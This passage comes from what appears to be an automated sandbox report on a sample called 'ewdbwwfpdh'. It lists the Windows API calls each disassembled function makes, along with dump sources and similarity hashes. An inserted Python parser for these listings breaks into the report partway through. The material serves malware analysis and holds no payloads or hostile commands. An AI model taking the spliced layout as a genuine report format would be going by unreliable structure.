• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001FAD94
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 001FADC7
• CloseHandle.KERNEL32(?), ref: 001FAF9C
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
  • Part of subcall function 001FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001FC00D,?,?), ref: 001FD314
  • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD350
  • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3C7
  • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3FD
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001FC404
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001FC45F
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001FC4C2
• RegCloseKey.ADVAPI32(?,?), ref: 001FC505
• RegCloseKey.ADVAPI32(00000000), ref: 001FC512
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 001DE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001DD6E2,?), ref: 001DE629
  • Part of subcall function 001DE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001DD6E2,?), ref: 001DE642
  • Part of subcall function 001DE9C5: GetFileAttributesW.KERNELBASE(?,001DD755), ref: 001DE9C6
• lstrcmpiW.KERNEL32(?,?), ref: 001DEC9F
• MoveFileW.KERNEL32(?,?), ref: 001DECD8
• _wcslen.LIBCMT ref: 001DEE17
• _wcslen.LIBCMT ref: 001DEE2F
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 001DEE7C
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 25cd0891853c43d822d0d69cb490d4faca4e64076ea127b8735955dc510441ac
                                                                                                    • Instruction ID: 70330cd56d4e655b23d03d5ef1a51e0ed745d6ca0fcd6f6d3abdb68ad881c646
                                                                                                    • Opcode Fuzzy Hash: 25cd0891853c43d822d0d69cb490d4faca4e64076ea127b8735955dc510441ac
                                                                                                    • Instruction Fuzzy Hash: 4B41D13AA002049FDB24DF7CC881A5DB7E6EF8A714F1541A8E515EB291D731ED42CB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetInputState.USER32 ref: 001E4225
                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 001E427C
                                                                                                    • TranslateMessage.USER32(?), ref: 001E42A5
                                                                                                    • DispatchMessageW.USER32(?), ref: 001E42AF
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001E42C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                    • String ID:
                                                                                                    • API String ID: 2256411358-0
                                                                                                    • Opcode ID: 8223b98c6cb3fc58a5403027106fe4175e98c7aa9a0a161c443b37e0e805a84e
                                                                                                    • Instruction ID: 943ac94ca4c1ae2b488634af949e0d9224cde0b2824969e759fce9774b8f73a4
                                                                                                    • Opcode Fuzzy Hash: 8223b98c6cb3fc58a5403027106fe4175e98c7aa9a0a161c443b37e0e805a84e
                                                                                                    • Instruction Fuzzy Hash: 2E31C634900786DFEB35CB76FC0CBBE7BA8EB15304F44056DF562820A0D7649889CB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 001D21A5
                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 001D2251
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 001D2259
                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 001D226A
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001D2272
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3382505437-0
                                                                                                    • Opcode ID: ee49177b7a2a3b33b4cd2fcd453162a46946501311dae457e14b5fcf52056637
                                                                                                    • Instruction ID: 1815183f1863154d03376b84ffc8e891c74ad7e6248c392d0f993b4c43720e21
                                                                                                    • Opcode Fuzzy Hash: ee49177b7a2a3b33b4cd2fcd453162a46946501311dae457e14b5fcf52056637
                                                                                                    • Instruction Fuzzy Hash: AB31C071900219EFDB04CFA8DD8DADE7BB5EB24315F10422AFA35A72D1C770A944CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002060A4
                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 002060FC
                                                                                                    • _wcslen.LIBCMT ref: 0020610E
                                                                                                    • _wcslen.LIBCMT ref: 00206119
                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00206175
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 763830540-0
                                                                                                    • Opcode ID: 7ed5d7962939ff9e05e1451aeb6600a2eef86f84e3ff8e0bd0623869769369c8
                                                                                                    • Instruction ID: 241d64d18dcefccdae65aa9b38455b4c0db97786fd7bb685153d5fa2c7385b23
                                                                                                    • Opcode Fuzzy Hash: 7ed5d7962939ff9e05e1451aeb6600a2eef86f84e3ff8e0bd0623869769369c8
                                                                                                    • Instruction Fuzzy Hash: B7218271910319ABDF109FA5DC889EEBBB8FF05324F104216F929EA2C6D7B095A5CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001D07D1,80070057,?,?,?,001D0BEE), ref: 001D08BB
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001D07D1,80070057,?,?), ref: 001D08D6
                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001D07D1,80070057,?,?), ref: 001D08E4
                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001D07D1,80070057,?), ref: 001D08F4
                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001D07D1,80070057,?,?), ref: 001D0900
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3897988419-0
                                                                                                    • Opcode ID: 512fad3a325d30d28b1d0ef87e4ad833e4c519031c5cddf34fc4c7e89115f582
                                                                                                    • Instruction ID: 9f46e1749ed1c5bf0f3e40c3004b5e7ba66f8bcbeb6beb80be04a97faf9042d5
                                                                                                    • Opcode Fuzzy Hash: 512fad3a325d30d28b1d0ef87e4ad833e4c519031c5cddf34fc4c7e89115f582
                                                                                                    • Instruction Fuzzy Hash: D3018F72A01318AFDB128FA4EC48B9A7BBDEB48752F104025FA05D2312D770ED019BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0BE0
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0BED
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0BFA
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0C07
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0C14
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001E0A39,?,001E3C56,?,00000001,001B3ACE,?), ref: 001E0C21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: 4958d41f72fbbe0f25860ae5fcf16403cfea2a78e5a2bff2fa20325c2d9d5356
                                                                                                    • Instruction ID: 75042a9ab274b09b19178ccb5f4954beb7ca515a2a747e3b019b28488be153c4
                                                                                                    • Opcode Fuzzy Hash: 4958d41f72fbbe0f25860ae5fcf16403cfea2a78e5a2bff2fa20325c2d9d5356
                                                                                                    • Instruction Fuzzy Hash: 5001EE75800B56CFCB32AF66D88080AFBF9FF503093108A3ED09252931C7B1A889CF80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001D64E7
                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 001D64FE
                                                                                                    • MessageBeep.USER32(00000000), ref: 001D6516
                                                                                                    • KillTimer.USER32(?,0000040A), ref: 001D6532
                                                                                                    • EndDialog.USER32(?,00000001), ref: 001D654C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3741023627-0
                                                                                                    • Opcode ID: 3d97f2540970cf654e7cdc8910c17a364df2b040798a60d86a2484fa81e3eeaf
                                                                                                    • Instruction ID: d98c9c3212f0e16eae25cb75680e427a08e5aba07cd402c6dbfae0250a83e6ea
                                                                                                    • Opcode Fuzzy Hash: 3d97f2540970cf654e7cdc8910c17a364df2b040798a60d86a2484fa81e3eeaf
                                                                                                    • Instruction Fuzzy Hash: F901A430501704ABEB245F64FD4EB9677BCFF10B45F00065AB587A10E2DBF5AA94CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 001A264E
                                                                                                      • Part of subcall function 001A2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,001ADB71,00241DC4,00000000,00241DC4,00000000,?,001ADB98,00241DC4,00000007,00241DC4,?,001ADF95,00241DC4), ref: 001A2D6E
                                                                                                      • Part of subcall function 001A2D58: GetLastError.KERNEL32(00241DC4,?,001ADB71,00241DC4,00000000,00241DC4,00000000,?,001ADB98,00241DC4,00000007,00241DC4,?,001ADF95,00241DC4,00241DC4), ref: 001A2D80
                                                                                                    • _free.LIBCMT ref: 001A2660
                                                                                                    • _free.LIBCMT ref: 001A2673
                                                                                                    • _free.LIBCMT ref: 001A2684
                                                                                                    • _free.LIBCMT ref: 001A2695
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 663b20ff6b6b337b0f4fa069080e587b64be8bb926b096c26aee726549f4454b
                                                                                                    • Instruction ID: e8b8374d78a94b462229ae84863b3f8d5dcddb027aa81a8d27f02ff0a8afc59d
                                                                                                    • Opcode Fuzzy Hash: 663b20ff6b6b337b0f4fa069080e587b64be8bb926b096c26aee726549f4454b
                                                                                                    • Instruction Fuzzy Hash: 5CF0DA7C8017209BC701EFB9BC098483B64BB27B51746060AF919A6676C7B119ABAF84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
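
The entries above are the report's per-function API listing: each block names the Win32/CRT calls a function makes, the call-site address of each (`ref:`), calls that only happen inside a callee (`Part of subcall function`), and the Opcode ID / fuzzy hashes used for similarity. As an added example (not Joe Sandbox's code, and not part of the original report), the following parser turns that text into records so the call sequence, call-site addresses and Opcode IDs can be pivoted on instead of read by eye. It assumes only the line shapes visible on this page; the sample text is constructed from two of the entries above, with the dump-source lines and most subcall arguments trimmed.

```python
"""Parse the per-function "APIs / Similarity" entries of a Joe Sandbox listing
into records: API sequence, call-site addresses (to pivot into the IDA snapshot)
and the Opcode ID (to match the same function across reports)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# API line shapes seen in the report: "Name.MODULE ref: ADDR",
# "Name.MODULE(args), ref: ADDR" and "Part of subcall function ADDR: ..."
_API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
# "Key: value" metadata lines (Opcode ID, API String ID, Uniqueness Score, ...)
_KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")
_SECTIONS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity",
             "Strings", "Uniqueness"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    def direct_calls(self) -> List[ApiCall]:
        """Calls made by this function itself, not by callees it reaches."""
        return [c for c in self.calls if c.subcall_of is None]

    def first_ref(self) -> Optional[int]:
        """Lowest direct call-site address: a cheap pivot into the IDA database."""
        direct = self.direct_calls()
        return min(c.ref for c in direct) if direct else None

def parse_listing(text: str) -> List[FunctionRecord]:
    """A new record starts at every 'APIs' header; other headers switch section."""
    records: List[FunctionRecord] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()   # drop indentation and bullets
        if not line:
            continue
        if line == "APIs":
            cur, section = FunctionRecord(), "APIs"
            records.append(cur)
        elif cur is None:
            continue
        elif line in _SECTIONS:
            section = line
        elif section == "APIs":
            m = _API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                sub = int(m["sub"], 16) if m["sub"] else None
                cur.calls.append(ApiCall(m["name"], m["module"], args,
                                         int(m["ref"], 16), sub))
        else:
            m = _KV_RE.match(line)
            if m:
                cur.meta[m["key"].strip()] = m["val"].strip()
    return records

def api_sequence(record: FunctionRecord) -> List[str]:
    """Direct API names in call-site order."""
    return [c.name for c in sorted(record.direct_calls(), key=lambda c: c.ref)]

def callers_of(records, api_name: str) -> List[FunctionRecord]:
    """Functions whose own code (not a subcall) invokes api_name."""
    return [r for r in records if any(c.name == api_name for c in r.direct_calls())]

# Constructed sample: two entries copied from this report, with the dump-source
# lines and most subcall arguments trimmed so the text stays short.
SAMPLE = """\
APIs
• GetInputState.USER32 ref: 001E4225
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 001E427C
• TranslateMessage.USER32(?), ref: 001E42A5
• DispatchMessageW.USER32(?), ref: 001E42AF
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001E42C0
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
• Opcode ID: 8223b98c6cb3fc58a5403027106fe4175e98c7aa9a0a161c443b37e0e805a84e
APIs
• _free.LIBCMT ref: 001A264E
  • Part of subcall function 001A2D58: RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 001A2D6E
  • Part of subcall function 001A2D58: GetLastError.KERNEL32(00241DC4,?), ref: 001A2D80
• _free.LIBCMT ref: 001A2660
Similarity
• Opcode ID: 663b20ff6b6b337b0f4fa069080e587b64be8bb926b096c26aee726549f4454b
"""

if __name__ == "__main__":
    print(*(api_sequence(r) for r in parse_listing(SAMPLE)), sep="\n")
```

Indentation and bullets are stripped first, so the text can be pasted straight from the rendered page. `callers_of` counts only direct calls: the `RtlFreeHeap` and `GetLastError` lines under `_free` are attributed to the callee at `001A2D58`, so they do not make the `_free` caller show up as a heap-freeing function. Match on `Opcode ID` (or the fuzzy hashes) rather than on addresses when comparing against another run, since the image base and therefore every `ref:` value can differ.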

                                                                                                    APIs
                                                                                                      • Part of subcall function 001905D2: EnterCriticalSection.KERNEL32(0024170C,?,00000000,?,0017D1DA,00243540,00000001,00000000,?,?,001EEF39,?,?,00000000,00000001,?), ref: 001905DD
                                                                                                      • Part of subcall function 001905D2: LeaveCriticalSection.KERNEL32(0024170C,?,0017D1DA,00243540,00000001,00000000,?,?,001EEF39,?,?,00000000,00000001,?,00000001,00242430), ref: 0019061A
                                                                                                      • Part of subcall function 00190433: __onexit.LIBCMT ref: 00190439
                                                                                                    • __Init_thread_footer.LIBCMT ref: 001F6B95
                                                                                                      • Part of subcall function 00190588: EnterCriticalSection.KERNEL32(0024170C,00000000,?,0017D208,00243540,001B27E9,00000001,00000000,?,?,001EEF39,?,?,00000000,00000001,?), ref: 00190592
                                                                                                      • Part of subcall function 00190588: LeaveCriticalSection.KERNEL32(0024170C,?,0017D208,00243540,001B27E9,00000001,00000000,?,?,001EEF39,?,?,00000000,00000001,?,00000001), ref: 001905C5
                                                                                                      • Part of subcall function 001E3EF6: LoadStringW.USER32(00000066,?,00000FFF,0020DCEC), ref: 001E3F3E
                                                                                                      • Part of subcall function 001E3EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 001E3F64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                    • String ID: x3$$x3$$x3$
                                                                                                    • API String ID: 1072379062-3664864905
                                                                                                    • Opcode ID: 7f60ed7c72706d26c87a832d280c1828c195ce41609c1f80d66243d370136b6d
                                                                                                    • Instruction ID: 304d0ac3fd4f1dba2b61f2c6e2f22b782fb15a6cdec5acb7b3fb4c95f8a8518a
                                                                                                    • Opcode Fuzzy Hash: 7f60ed7c72706d26c87a832d280c1828c195ce41609c1f80d66243d370136b6d
                                                                                                    • Instruction Fuzzy Hash: C5C1C275A00109AFCB14DF98C891EBEB7B9FF58300F148069FA55AB292DB74ED45CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001DCAC6
                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 001DCB0C
                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00242990,00F36198), ref: 001DCB55
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 135850232-4108050209
                                                                                                    • Opcode ID: a33a5b4279582e6ddcd4f146c4e38bfa2f03593a09595a489d5d3e882420b21f
                                                                                                    • Instruction ID: 3c16734010eb6c8d4042fde663e7bb07df40f4b8da7231a511c2d97d6fb6fd7f
                                                                                                    • Opcode Fuzzy Hash: a33a5b4279582e6ddcd4f146c4e38bfa2f03593a09595a489d5d3e882420b21f
                                                                                                    • Instruction Fuzzy Hash: A341A0702053429FDB20DF24D846F2ABBE4AF94364F144A1FF96597391D770E944CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0020DCD0,00000000,?,?,?,?), ref: 00204E09
                                                                                                    • GetWindowLongW.USER32 ref: 00204E26
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00204E36
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long
                                                                                                    • String ID: SysTreeView32
                                                                                                    • API String ID: 847901565-1698111956
                                                                                                    • Opcode ID: bdc2e3cae48a074fa4084accc3790c6353079dfdbbec1aae55b38ae4c103bca4
                                                                                                    • Instruction ID: 37827dd887648fd92096d675a03eba6cd0d2ddf613cd170d38cbf26aa8f3ecc6
                                                                                                    • Opcode Fuzzy Hash: bdc2e3cae48a074fa4084accc3790c6353079dfdbbec1aae55b38ae4c103bca4
                                                                                                    • Instruction Fuzzy Hash: 4C318F71110306AFDF219E78DC45BEA7BA9FB59334F208719FA79931E2D770A8608750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0020489F
